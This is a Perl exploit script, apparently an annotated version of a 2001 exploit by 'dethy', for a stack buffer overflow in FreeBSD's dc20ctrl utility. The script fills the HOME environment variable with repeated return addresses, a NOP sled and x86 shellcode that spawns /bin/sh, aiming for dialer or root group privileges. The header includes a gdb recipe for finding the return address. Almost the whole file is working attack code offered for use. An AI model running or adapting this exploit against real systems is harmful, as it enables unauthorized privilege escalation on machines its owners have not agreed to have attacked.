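#!/usr/bin/perl
# FreeBSD 3.x/4.X dc20ctrl local exploit
# should yield gid(dialer) or gid(root) on non-fbsd systems.
#
# vulnerability lies in session.c in getenv(), other bugs
# exist, such as the -P with 344 byte arg, overwriting %ecx.
# To get $ret do: export HOME=`perl -e 'print "A"x520'`; dc20ctrl;
# gdb dc20ctrl -c dc20ctrl.core ; in gdb type: info reg $esp
#
# code by dethy - Feb 10 2001.
# dethy@synnergy.net / www.synnergy.net
#
# Usage: ./dc20ctrl.pl [RET]
#   RET  optional hex override for the return address (e.g. 0xbfbff79c)
#        obtained with the gdb recipe above; defaults to the FreeBSD 4.2
#        value hard-coded below.
#
# Payload placed in HOME, in order:
#   [ ceil($buf/4) copies of $ret ] [ NOP sled ] [ shellcode ]
# Per the header, the target reads HOME via getenv() in session.c and
# (presumably) copies it into a fixed stack buffer; the 520-byte block of
# repeated $ret is sized so one copy lands on the saved return address and
# control transfers into the sled, which slides into the shellcode.
use strict;
use warnings;

# x86 FreeBSD shellcode, kept byte-for-byte from the original.
# "\xb0\x3b" loads syscall 59 (execve) and the "\x9a ... \x07\x07"
# sequence appears to be the lcall 7:0 syscall gate used on FreeBSD;
# the trailing "/bin/sh.-c.sh" is the argv that gets NUL-patched in place.
my $shellcode =
    "\xeb\x37\x5e\x31\xc0\x88\x46\xfa\x89\x46\xf5\x89\x36\x89\x76" .
    "\x04\x89\x76\x08\x83\x06\x10\x83\x46\x04\x18\x83\x46\x08\x1b" .
    "\x89\x46\x0c\x88\x46\x17\x88\x46\x1a\x88\x46\x1d\x50\x56\xff" .
    "\x36\xb0\x3b\x50\x90\x9a\x01\x01\x01\x01\x07\x07\xe8\xc4\xff" .
    "\xff\xff\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02" .
    "\x02\x02\x02/bin/sh.-c.sh";

my $ret = 0xbfbff79c;    # FreeBSD 4.2 -- see the gdb recipe in the header
if (@ARGV) {
    # Accept only a 32-bit hex literal so a stray argument cannot turn
    # into a silently wrong address.
    my ($hex) = $ARGV[0] =~ /\A(?:0x)?([0-9a-fA-F]{1,8})\z/
        or die "usage: $0 [RET as hex, e.g. 0xbfbff79c]\n";
    $ret = hex($hex);
}

my $buf = 520;       # bytes of repeated $ret in front of the sled
my $egg = 1000;      # size budget for sled + shellcode (minus 100 slack)
my $nop = "\x90";

print "\nFreeBSD dc20ctrl local exploit by dethy\n\n";

# Fixed-offset exploit: emptying the environment makes the stack layout
# of the target (and therefore where HOME ends up) predictable, so $ret
# does not have to be guessed per run.  Assigning to %ENV clears the real
# environment that exec() will hand to the target.
%ENV = ();

# Explicit little-endian 32-bit.  The original used pack('l'), which is
# host byte order and signed; 'V' yields the x86 target's byte order no
# matter which host runs this script.
my $addr = pack('V', $ret);

# HOME is passed as a C string: a NUL anywhere in the address or the
# shellcode would truncate the payload before the target ever copies it.
die sprintf("return address 0x%08x contains a NUL byte\n", $ret)
    if index($addr, "\0") >= 0;
die "shellcode contains a NUL byte\n"
    if index($shellcode, "\0") >= 0;

my $sled_len = $egg - length($shellcode) - 100;
die "egg ($egg) too small for the shellcode\n" if $sled_len < 0;

# ceil($buf/4) address copies (matches the original 4-byte stride loop),
# then the sled, then the shellcode.
my $payload = ($addr x int(($buf + 3) / 4))
            . ($nop x $sled_len)
            . $shellcode;

$ENV{'HOME'} = $payload;

# Target path kept as in the original.  NOTE(review): it is relative to
# the current directory ("./usr/local/bin/..."), which looks like a typo
# for /usr/local/bin/dc20ctrl -- confirm before relying on it.  The
# trailing 0 is also original; with Perl's list-form exec it becomes
# argv[1] = "0" (probably a C NULL-terminator habit), so no shell is
# involved and the payload reaches the target only through HOME.
my $target = "./usr/local/bin/dc20ctrl";
exec($target, 0) or die "exec $target: $!\n";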